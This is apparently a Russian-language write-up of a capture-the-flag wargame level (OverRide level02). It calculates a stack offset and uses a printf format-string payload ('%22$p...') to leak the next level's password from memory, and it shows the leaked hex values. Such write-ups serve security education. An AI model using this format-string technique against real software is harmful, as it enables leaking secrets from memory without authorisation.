Начинаем изучение level02. Тут есть много чего интересного, но самое важное что сам бинарник для нас считывает "/home/users/level03/.pass", так что нам нужно найти способ как считать его из стека.

Мы можем воспользоваться уязвимостью printf(). Так мы получаем что буфер который нам нужен находиться в rbp - 0xa0 = 160, а размер стека 288(0x120), для вывода мы будем использовать printf() который выводить параметр %X$p. И нужно еще учитывать что у нас 64 байтом коде. Это значить что каждый наш сдвиг спецификатора x$стек который он читает на 8 байт. Подытожим смешение которое нам нужно это: (288 - 160) / 8 + 1 = 22.

---------------------------------------------------------------------------------------------------------

level02@OverRide:~$ ./level02
===== [ Secure Access System v1.0 ] =====
/***************************************\
| You must login to access this system. |
\**************************************/
--[ Username: %22$p %23$p %24$p %25$p %26$p
--[ Password:
*****************************************
0x756e505234376848 0x45414a3561733951 0x377a7143574e6758 0x354a35686e475873 0x48336750664b394d does not have access!
 
---------------------------------------------------------------------------------------------------------

осталось только перевести перевести hex в ascii c реверсом и мы получаем ключ.